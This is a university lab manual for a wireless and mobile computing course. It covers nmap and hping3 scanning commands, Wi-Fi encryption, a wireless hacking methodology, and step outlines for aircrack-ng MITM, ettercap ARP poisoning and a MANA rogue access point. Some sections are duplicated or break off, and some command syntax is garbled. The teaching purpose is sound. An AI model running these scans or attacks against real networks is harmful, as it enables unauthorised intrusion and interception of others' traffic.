Sagar Institute of Science, Technology & Research

Ratibad Campus Bhopal

Approved By AICTE New Delhi and Affiliated to RGPV Bhopal

DEPARTMENT OF COMPUTER SCIENCE ENGINEERING

LAB MANUAL
CS-702(C): Wireless & Mobile Computing
 Lab Plan

Sr. Date of Date of

Title Sign Remark
No. Performance submission
1 Study of basic Network Scanning
Tools and Commands.
Study Wireless Encryption and its
2 types.
Wireless Hacking Methodology.
3
4 Prepared the case study on Wi-fi
discovery Tools.
Study on GPS Mapping and tools.
5

Prepared the case study on Wi-Fi

6
Hotspot Finder Tools.

7 MITM Attack Using Aircrack-ng

8 Wireless ARP Poisoning Attack

Creation of a Rogue AP Using MANA

9 Toolkit

10 Study on Bluetooth protocol stack

11 Write installation steps for Android

studio

12 Develop an android app which

displays “Hello, welcome to
Android Lab” message
 PRACTICAL-1

AIM:- Study of basic Network Scanning Tools and Commands.

THEORY:- Scanning tools are used to scan and identify live hosts, open ports, running services on a target
network, location info, NetBIOS info, and information about all TCP/IP and UDP open ports. The information
obtained from these tools will help an ethical hacker in creating the profile of the target organization and
scanning the network for open ports of the devices connected.

Scanning tools are used to scan and identify live hosts, open ports, running services on a target
network, location info, NetBIOS info, and information about all TCP/IP and UDP open ports. The information
obtained from these tools will help an ethical hacker in creating the profile of the target organization and
scanning the network for open ports of the devices connected.

● Nmap Source: https://nmap.org Nmap ("Network Mapper") is a security scanner for network
exploration and hacking. It allows you to discover hosts, ports, and services on a computer network,
thus creating a "map" of the network. It sends specially crafted packets to the target host and then
analyzes the responses to accomplish its goal. It scans vast networks of literally hundreds of
thousands of machines. Nmap includes many mechanisms for port scanning (TCP and UDP), OS
detection, version detection, ping sweeps, and so on. Either a network administrator or an attacker
can use this tool for their specific needs. Network administrators can use Nmap for network
inventory, managing service upgrade schedules, and monitoring host or service uptime. Attackers use
Nmap to extract information such as live hosts on the network, open ports, services (application
name and version), type of packet filters/firewalls, MAC details, and OSs along with their versions.
Syntax:#nmap<options><TargetIPaddress>
 Hping2/Hping3: Source:http://www.hping.org

Hping2/Hping3 is a command-line-oriented network scanning and packet crafting tool for the TCP/IP
protocol that sends ICMP echo requests and supports TCP, UDP, ICMP, and raw-IP protocols. It
performs network security auditing, firewall testing, manual path MTU discovery, advanced
traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stacks auditing, and other
functions. It can send custom TCP/IP packets and display target replies similarly to a ping program
with ICMP replies. It handles fragmentation as well as arbitrary packet body and size, and it can be
used to transfer encapsulated files under the supported protocols. It also supports idle host scanning.
IP spoofing and network/host scanning can be used to perform an anonymous probe for services.
Hping2/Hping3 also has a Traceroute mode, which enables attackers to send files between covert
channels. It also determines whether the host is up even when the host blocks ICMP packets. Its
firewalk-like usage allows the discovery of open ports behind firewalls. It performs manual path MTU
discovery and enables attackers to perform remote OS fingerprinting.
Using Hping, an attacker can study the behavior of an idle host and gain information about the target,
such as the services that the host offers, the ports supporting the services, and the OS of the target.
This type of scan is a predecessor to either heavier probing or outright attacks.
Syntax: # hping <options> <Target IP address>

● ICMP Scanning A ping sweep or Internet Control Message Protocol (ICMP) scanning is a process of
 sending an ICMP request or ping to all the hosts on the network to determine the ones that are up
The OS, router, switch, and IP-based devices use this protocol via the ping command for echo request
and echo response as a connectivity tester between different hosts.

Hping Commands The various Hping commands are as follows:

● ICMP ping -
Ex.hping3-110.0.0.25
Hping performs an ICMP ping scan by specifying the argument -1 in the command line. You may use --
ICMP or -1 as the argument in the command line. By issuing the above command, hping sends an
ICMP echo request to 10.0.0.25 and receives an ICMP reply similarly to a ping utility.
● ACK scan on port 80
Ex.hping3–A10.0.0.25–p80
Hping can be configured to perform an ACK scan by specifying the argument -A in the command line.
Here, you set the ACK flag in the probe packets and perform the scan. You perform this scan when a
host does not respond to a ping request. By issuing this command, Hping checks if a host is alive on a
network. If it finds a live host and an open port, it returns an RST response.
● UDP scan on port 80
Ex. hping3 -2 10.0.0.25 –p 80 Hping uses TCP as its default protocol. Using the argument -2 in the
command line specifies that Hping operates in the UDP mode. You may use either --udp or -2 as the
argument in the command line.

● Collecting Initial Sequence Number

Ex. hping3 192.168.1.103 -Q -p 139 –s
 Using the argument -Q in the command line, Hping collects all the TCP sequence numbers generated
by the target host (192.168.1.103).
Firewalls and Timestamps
Ex. hping3 -S 72.14.207.99 -p 80 --tcp-timestamp
Many firewalls drop those TCP packets that do not have the TCP Timestamp option set. By adding the
--tcp-timestamp argument in the command line, you can enable the TCP timestamp option in Hping
and try to guess the timestamp update frequency and uptime of the target host (72.14.207.99).
SYN scan on port 50-60
● Ex. hping3 -8 50-60 –S 10.0.0.25 –V
Using the argument -8 or --scan in the command line, you are operating Hping in the scan mode to
scan a range of ports on the target host. Adding the argument -S allows you to perform a SYN scan.
Therefore, the above command performs a SYN scan on ports 50–60 on the target host.

● FIN, PUSH and URG scan on port 80

Ex. hping3 –F –P –U 10.0.0.25 –p 80
By adding the arguments –F, –P, and –U in the command line, you are setting FIN, PUSH, and URG
packets in the probe packets. By issuing this command, you are performing FIN, PUSH, and URG scans
on port 80 on the target host (10.0.0.25). If port 80 is open, you will not receive a response. If the
port is closed, Hping will return an RST response.
● Scan entire subnet for live host
Ex. hping3 -1 10.0.1.x --rand-dest –I eth0
By issuing this command, Hping performs an ICMP ping scan on the entire subnet 10.0.1.x; in other
words, it sends an ICMP echo request randomly (--rand-dest) to all the hosts from 10.0.1.0 to
10.0.1.255 that are connected to the interface eth0. The hosts whose ports are open will respond
with an ICMP reply. In this case, you have not set a port; hence, Hping sends packets to port 0 on all
IP addresses by default.

● Intercept all traffic containing HTTP signature

Ex. hping3 -9 HTTP –I eth0

The following table lists the various scanning methods and their respective Hping commands:
● Metasploit Source: https://www.metasploit.com
Metasploit is an open-source project that provides the infrastructure, content, and tools to perform
penetration tests and extensive security auditing. It provides information about security
vulnerabilities and aids in penetration testing and IDS signature development. It facilitates the tasks
of attackers, exploits writers, and payload writers.
major advantage of the framework is the modular approach, i.e., allowing the combination of any
exploit with any payload.
It enables you to automate the process of discovery and exploitation and provides you with the
necessary tools to perform the manual testing phase of a penetration test. You can use Metasploit
Pro to scan for open ports and services, exploit vulnerabilities, pivot further into a network, collect
evidence, and create a report of the test results.
● NetScanTools Pro Source: https://www.netscantools.com
NetScanTools Pro is an investigation tool that allows you to troubleshoot, monitor, discover, and
detect devices on your network. Using this tool, you can easily gather information about the local
LAN as well as Internet users, IP addresses, ports, and so on. Attackers can find vulnerabilities and
exposed ports in the target system. It helps the attackers to list IPv4/IPv6 addresses, hostnames,
domain names, email addresses, and URLs automatically or manually (using manual tools).
NetScanTools Pro combines many network tools and utilities categorized by their functions, such as
active, passive, DNS, and local computers.
 PRACTICAL-2

AIM:- Study the Wireless Encryption and its type.

THEORY:-

Wireless encryption is a process of protecting a wireless network from attackers who attempt to
collect sensitive information by breaching the RF traffic. This section provides insight into various
wireless encryption standards such as Wired Equivalent Privacy (WEP), Wi-Fi Protected Access
(WPA), WPA2, and WPA3, in addition to issues in WEP, WPA, and WPA2.

1) Wired Equivalent Privacy (WEP) Encryption-

WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to ensure data
confidentiality on wireless networks at a level equivalent to that of wired LANs, which can use
physical security to stop unauthorized access to a network. In a WLAN, a user or an attacker can
access the network without physically connecting to the LAN. Therefore, WEP utilizes an encryption
mechanism at the data link layer for minimizing unauthorized access to the WLAN. This is
accomplished by encrypting data with the symmetric Rivest Cipher 4 (RC4) encryption algorithm,
which is a cryptographic mechanism used to defend against threats. Role of WEP in Wireless
Communication

WEP protects against eavesdropping on wireless communications.

It attempts to prevent unauthorized access to a wireless network.

WEP was developed without any academic or public review. In particular, it was not reviewed by
cryptologists during development. Therefore, it has significant vulnerabilities and design flaws. WEP
is a stream cipher that uses RC4 to produce a stream of bytes that are XORed with plaintext. The
length of the WEP and secret key are as follows:

● 64-bit WEP uses a 40-bit key

● 128-bit WEP uses a 104-bit key

● 256-bit WEP uses 232-bit key.

How WEP Works

 ● CRC-32 checksum is used to calculate a 32-bit integrity check value (ICV) for the data, which,
in turn, is added to the data frame.
A 24-bit arbitrary number known as the initialization vector (IV) is added to the WEP key; the
WEP key and IV are together called the WEP seed.
The WEP seed is used as the input to the RC4 algorithm to generate a keystream, which is
bit-wise XORed with a combination of the data and ICV to produce the encrypted data.
The IV field (IV + PAD + KID) is added to the ciphertext to generate a MAC frame.

2) Wi-Fi Protected Access (WPA) Encryption- Wi-Fi Protected Access (WPA) is a security protocol
defined by the 802.11i standard. In the past, the primary security mechanism used between
wireless APs and wireless clients was WEP encryption, which has a major drawback in that it uses
a static encryption key. An attacker can exploit this weakness using tools that are freely available
on the Internet. IEEE defines WPA as “an expansion to the 802.11 protocols that can allow for
increased security.” Nearly every Wi-Fi manufacturer provides WPA.
WPA has better data encryption security than WEP because messages pass through a Message
Integrity Check (MIC) using the Temporal Key Integrity Protocol (TKIP), which utilizes the RC4
stream cipher encryption with 128-bit keys and 64-bit MIC to provide strong encryption and
authentication. WPA is an example of how 802.11i provides stronger encryption and enables
pre-shared key (PSK) or EAP authentication. WPA uses TKIP for data encryption, which eliminates
the weaknesses of WEP by including per-packet mixing functions, MICs, extended IVs and re-
keying mechanisms.combined with a hash function or mixing function to generate a 128-bit and
104-bit key.
This key is then combined with RC4 to produce the keystream, which should be of the same
length as the originalmessage
The MAC service data unit (MSDU) and message integrity check (MIC) are combined using the
Michaelalgorithm.
a)The combination of MSDU and MIC is fragmented to generate the MAC protocol data unit
(MPDU).
b) A 32-bit ICV is calculated for the MPDU. The combination of MPDU and ICV is bitwise XORed
with the keystream to produce the encrypted data.
c)The IV is added to the encrypted data to generate the MAC frame.

3) WPA2 Encryption-

Wi-Fi Protected Access 2 (WPA2) is a security protocol used to safeguard wireless networks.
WPA2 replaced WPA in 2006. It is compatible with the 802.11i standard and supports many
security features that WPA does not. WPA2 introduces the use of the National Institute of
Standards and Technology (NIST) FIPS 140-2-compliant AES encryption algorithm, which is a
strong wireless encryption algorithm, and the Counter Mode Cipher Block Chaining Message
 Authentication Code Protocol (CCMP). It provides stronger data protection and network access
control than WPA. Furthermore, it gives a high level of security to Wi-Fi connections so that only
authorized users can access the network.

Modes of Operation WPA2 offers two modes of operation: WPA2-Personal: WPA2-Personal uses a
password set in advance, called the pre-shared key (PSK), to protect unauthorized network access.
Each wireless device uses the same 256-bit key generated from a password to authenticate with the
AP. In the PSK mode, each wireless network device encrypts the network traffic using a 128-bit key
derived from a passphrase of 8–63 ASCII characters. The router uses the combination of a
passphrase, network SSID, and TKIP to generate a unique encryption key for each wireless client.
These encryption keys change continually.

4) WPA2-Enterprise: WPA2-Enterprise uses EAP or RADIUS for centralized client authentication

using multiple authentication methods, such as token cards, Kerberos, and certificates. WPA-
Enterprise assigns a unique ciphered key to every system and hides it from the user in order to
provide additional security and to prevent the sharing of keys. Users are allocated login credentials
by a centralized server, which they must present when connecting to the network.

Modes of Operation WPA2 offers two modes of operation:

a) WPA2-Personal: WPA2-Personal uses a password set in advance, called the pre-shared key
(PSK), to protect unauthorized network access. Each wireless device uses the same 256-bit key
generated from a password to authenticate with the AP. In the PSK mode, each wireless network
device encrypts the network traffic using a 128-bit key derived from a passphrase of 8–63 ASCII
characters. The router uses the combination of a passphrase, network SSID, and TKIP to
generate a unique encryption key for each wireless client. These encryption keys change
continually.

b) WPA2-Enterprise: WPA2-Enterprise uses EAP or RADIUS for centralized client authentication

using multiple authentication methods, such as token cards, Kerberos, and certificates. WPA-
Enterprise assigns a unique ciphered key to every system and hides it from the user in order to
provide additional security and to prevent the sharing of keys. Users are allocated login
credentials by a centralized server, which they must present when connecting to the network

4) WPA3-Enterprise: This mode is based on WPA2. It offers better security than WPA2 across the
network and protects sensitive data using many cryptographic concepts and tools. Some of the
security protocols used by WPA3-Enterprise are described below.

a) Authenticated encryption: It helps in maintaining the authenticity and confidentiality of data.

For this purpose, WPA3 uses the 256-bit Galois/Counter Mode Protocol (GCMP-256).
 Key derivation and validation: It helps in generating a cryptographic key from a password or
master key. It uses the 384-bit hashed message authentication mode (HMAC) with the
Secure Hash Algorithm, termed HMAC-SHA-384.

b) Key establishment and verification: It helps in exchanging cryptographic keys among two
parties. For this purpose, WPA3 uses Elliptic Curve Diffie–Hellman (ECDH) exchange and
Elliptic Curve Digital Signature Algorithm (ECDSA) using a 384-bit elliptic curve.

c) Frame protection and robust administration: WPA3 uses 256-bit Broadcast/Multicast

Integrity Protocol Galois Message Authentication Code (BIP-GMAC-256) for this purpose.
 PRACTICAL-3

AIM:- Wireless Hacking Methodology and tools.

Theory :- To hack wireless networks, an attacker follows a hacking methodology involving

systematic steps to perform a successful attack on a target wireless network. This section
explains the steps of the wireless hacking methodology. The wireless hacking methodology
helps an attacker reach the goal of hacking a target wireless network. An attacker usually
follows a hacking methodology to be sure of finding every single-entry point to break into the
target network. The objective of the wireless hacking methodology is to compromise a Wi‐Fi
network in order to gain unauthorized access to network resources.

Attackers use the following steps to perform wireless hacking:

● Wi-Fi discovery

● GPS mapping

● Wireless traffic analysis

● Launch of wireless attacks

● Wi-Fi encryption cracking

● Wi-Fi network compromising.

1. Wi-Fi Discovery- The first step is to find a Wi-Fi network or device. An attacker performs
Wi-Fi discovery to locate a target wireless network using tools such as inSSIDer Plus,
NetSurveyor, etc. Wi-Fi discovery procedures include footprinting the wireless networks
and finding the appropriate target network that is in range to launch an attack.

● Wi-FiChalkingTechniques
WarWalking: Attackers walk around with Wi-Fi-enabled laptops installed with a wireless
discovery tool to map out open wireless networks.
WarChalking: Symbols are drawn in public places to advertise open Wi-Fi networks.

▪ WarFlying: Attackers use drones to detect open wireless networks.

WarDriving: Attackers drive around with Wi-Fi-enabled laptops installed with
a wireless discovery tool to map out open wireless networks.
The following are some of the important arguments of the Wash command that are used by
attackers:

-i, --interface=<iface> (specifies the interface to capture packets)

-a, --all (displays all access points, including those with WPS disabled) -f, --file [FILE1 FILE2 FILE3
...] (reads packets from captured files)

-c, --channel=<num> (specifies the channel to listen [auto])

-o, --out-file=<file> (writes data to a file)

-n, --probes=<num> (specifies maximum number of probes to send to each AP in the scan mode)
-D, --daemonize (Wash command)

-5, --5ghz (command to use 5 GHz 802.11 channels)

-s, --scan (command to run in the scan mode)

-u, --survey (command to use the survey mode [default])

Attackers use the following command to discover the access point, extended service set identifier
(ESSID), and BSSID of a device or router:

# sudo wash -i wlan0

 PRACTICAL-4

AIM:- Wi-fi Discovery Tools.

Theory:-
1. inSSIDer Plus Source: https://www.metageek.com inSSIDer Plus is a Wi-Fi optimization and
troubleshooting tool that scans for wireless networks with the user’s Wi-Fi adapter so that the
user can visualize their signal strengths and the channels they are using. It also lists useful
information about each network. Attackers use inSSIDer Plus to discover Wi-Fi access points and
devices in their vicinity.
Features: o Inspects WLAN and surrounding networks to troubleshoot competing APs o Tracks
the strength of a received signal in terms of dBm over time and filters APs o Highlights APs for
areas with high Wi-Fi concentration o Exports Wi-Fi and GPS data to a KML file to view in Google
Earth o Shows overlapping Wi-Fi network channels.
2. NetSurveyor Source: http://nutsaboutnets.com
NetSurveyor is an 802.11 network discovery tool that gathers information about nearby wireless
APs in real time and displays it in different diagnostic views and charts. Data can be recorded for
extended periods and played back later. NetSurveyor also generates reports in the Adobe PDF
format. Attackers use NetSurveyor to discover Wi-Fi networks, local APs, and the signal strengths
of their beacons.
The following are some of the additional Wi-Fi discovery tools:
a. Wi-Fi Scanner (https://lizardsystems.com)
b. Acrylic Wi-Fi Home (https://www.acrylicwifi.com)
c. WirelessMon (https://www.passmark.com)
d. Ekahau HeatMapper (https://www.ekahau.com)

Mobile-based Wi-Fi Discovery Tools:-

1. WiFi Analyzer Source: https://play.google.com WiFi Analyzer is a Wi-Fi network optimization tool
used to examine surrounding Wi-Fi networks, measure their signal strengths, and identify crowded
channels. Attackers use WiFi Analyzer to detect nearby APs, graph the signal strengths of channels,
estimate distances to APs, etc.

The following are some of the additional mobile-based Wi-Fi discovery tools:
● OpenSignalMaps (https://opensignal.com)
● Network Signal Info Pro (http://www.kaibits-software.com)
● WiFi Manager (https://kmansoft.com)
● Network Signal Info & WiFi Refresher (https://play.google.com)
● WiFi Scanner (https://play.google.com)
 PRACTICAL-5

AIM:-GPS Mapping.
Theory :- The second step in the wireless hacking methodology is GPS mapping. An attacker who
discovers a target wireless network can proceed toward wireless hacking by drawing a map of the network.
In this step, the attacker may use various automated tools to map the target wireless network.
The Global Positioning System (GPS) is a space-based satellite navigation system that provides the location of
physical entities on Earth, along with the time when they were present at that location. Using a GPS utility,
anyone can find a specific location on Earth and its geographical features. An attacker uses this GPS utility to
locate and map the target wireless network in a particular geographical area. A GPS receiver calculates
position, time, and velocity by processing specifically coded satellite signals. Attackers know that the
presence of free Wi-Fi networks in an area may indicate the existence of an unsecured network. Attackers
usually create maps of discovered Wi-Fi networks and a database with statistics collected using Wi-Fi
discovery tools such as inSSIDer Office and NetSurveyor. GPS is useful in tracking the location of discovered
Wi-Fi networks and the coordinates uploaded to sites such as WiGLE. Attackers can share such information
with the hacking community or sell it for profit.

1. WiGLE
Source: https://wigle.net WiGLE consolidates information on wireless networks worldwide, including
their locations, in a central database, and it provides user-friendly Java, Windows, and web
applications that can map, query, and update the database via the web. A wireless network can be
added to WiGLE from a stumble file or manually, and remarks can be added to existing networks. The
location of discovered Wi-Fi networks can be tracked using WiGLE through the following steps. o
Navigate to https://wigle.net and click on Uploads. o In the Uploads page, click on UPLOAD A FILE to
upload a log file.
2. Maptitude Mapping Software Source: https://www.caliper.com With Maptitude mapping software
and a GPS receiver, attackers can track a victim’s location with a portable computer, collect field
data, and create new or updated geographic files that mark map features. In detail, Maptitude
Mapping Software allows attackers to do the following: o Track the location of a GPS receiver on a
map o Log GPS data o Import GPS playback data from a handheld GPS o Locate points by coordinate
or by longitude/latitude o Choose markers, pushpins, and custom icons for locations

The following are some additional GPS mapping tools:

● Skyhook (https://www.skyhook.com)
● ExpertGPS (https://www.expertgps.com)
● GPS Visualizer (https://www.gpsvisualizer.com)
● Mapwel (https://www.mapwel.net)
● TrackMaker (https://www.trackmaker.com)
 PRACTICAL-6

AIM:- Wi-Fi Hotspot Finder Tools.

Theory :-
1. Wi-Fi Finder Source: http://www.appsapk.com Wi-Fi Finder is an android mobile application that can
be used for finding free or paid public Wi-Fi hotspots online or offline. Attackers use Wi-Fi Finder to
scan for Wi-Fi hotspots around them and access their details. Its features include the following: o
Scan for nearby Wi-Fi hotspots o Search for public Wi-Fi networks anywhere in the world o View Wi-
Fi hotspot details, call locations, get directions, or share the hotspot o Filter results by location (cafe,
hotel, etc.) or provider type.

The following are some additional Wi-Fi hotspot finder tools:

● Homedale::Wi-Fi/WLAN Monitor (http://www.the-sz.com)
● Fing - Network Tools (https://play.google.com)
● Finder - Free WiFi Map (https://play.google.com)
● WFi Map (https://play.google.com
 PRACTICAL-7

AIM:- MITM Attack Using Aircrack-ng

Theory :- An attacker can perform an MITM attack using aircrack-ng through the following steps.
Run airmon-ng in the monitor mode.
Start airodump to discover SSIDs on the interface.
 PRACTICAL-8

AIM:- Wireless ARP Poisoning Attack

THEORY:- ARP determines the MAC address of an AP if it already knows its IP address. Usually, ARP does not
possess any feature to verify whether the responses are from valid hosts. ARP poisoning is an attack
technique that exploits this lack of verification. In this technique, the ARP cache maintained by the OS is
corrupted with wrong MAC addresses. An attacker achieves this by sending an ARP replay packet
constructed with a wrong MAC address. An ARP poisoning attack impacts all the hosts in a subnet. All
stations associated with a subnet affected by an ARP poisoning attack are vulnerable because most APs act
as transparent MAC-layer bridges. All hosts connected to a switch or hub are susceptible to ARP poisoning
attacks if the AP is connected directly to that switch or hub without any router/firewall between them. The
below figure illustrates the process of an ARP poisoning attack.

ARP Poisoning Attack Using Ettercap

Source: https://www.ettercap-project.org Attackers use ettercap to identify the MAC addresses of

the clients and routers for performing various attacks such as ARP poisoning, sniffing, and MITM
attacks. Using this tool, an attacker can obtain all the information about the network traffic of the
victim. An attacker performs an ARP poisoning attack using ettercap through the following steps.

● Launch the ettercap graphical interface and enable the unified sniffing option by selecting
Sniff

● Unified Sniffing from the menu bar. This allows the attacker to bridge the connection and sniff
the traffic crossing the interfaces.

● In the ettercap Input pop-up window, set Network interface to sniff and click on OK. This will
show advanced menu options such as targets, hosts, MITM, and plugins.
 PRACTICAL-9

AIM:- Creation of a Rogue AP Using MANA Toolkit

THEORY:-

Rogue APs are wireless APs that an attacker installs on a network without authorization and are not
under the management of the network administrator. These rogue APs are not configured for
security, unlike the authorized APs on the target wireless network. Thus, this rogue AP can provide
backdoor access to the target wireless network. Interesting scenarios for rogue AP installation and
setup include the following.

● Compact, pocket-sized rogue AP plugged into an Ethernet port of the target network: An
attacker can use compact, pocket-sized rogue APs because they are easily available, can be
stealthily brought onsite, and consume very little power.

● Rogue AP connected to corporate networks over a Wi-Fi link: An attacker connects a rogue
AP to a Wi-Fi link of the target network. Because the rogue AP connects wirelessly to the
authorized network, it is easily hidden. However, it requires the credentials of the target
network to connect.

● USB-based rogue AP plugged into a network machine: An attacker can easily plug a USB-
based rogue AP into any Windows machine on the target network that is connected through
wired or wireless means. The USB AP’s software shares the network access of the machine
with the rogue AP. This eliminates the need for both an unused Ethernet port and the
credentials of the target Wi-Fi, which are required in the above two scenarios to set up a
rogue AP.

● Software-based rogue AP running on a network Windows machine: An attacker can set up a

software-based rogue AP on the embedded/plugged Wi-Fi adapter of the target network,
instead of a separate hardware device.

Creation of a Rogue AP Using MANA Toolkit

MANA Toolkit comprises a set of tools that are used by the attackers for creating rogue APs and
perform sniffing attacks and MITM attack. It is also used for bypassing HTTPS and HTTP Strict
Transport Security (HSTS). Attackers use MANA Toolkit to create a rogue AP through the following
steps. Modify MANA’s configuration file hostapd-mana.conf using any text editor to set up a fake
access point. Set the wireless interface (wlan0 is used here) as well as the MAC address (BSSID) or
SSID (the SSID Free Internet is used
Once connected to the Internet through the rogue AP, all the data packets from the device flows through
the rogue AP. Now, tools such as tcpdump and Wireshark can be used to capture and analyze the
packets.
https://www.studocu.com/in/document/gujarat-technological-university/mobile-
computing-and-wireless-communication/mobile-computing-and-wireless-
communication2170710-lab-manual/18844495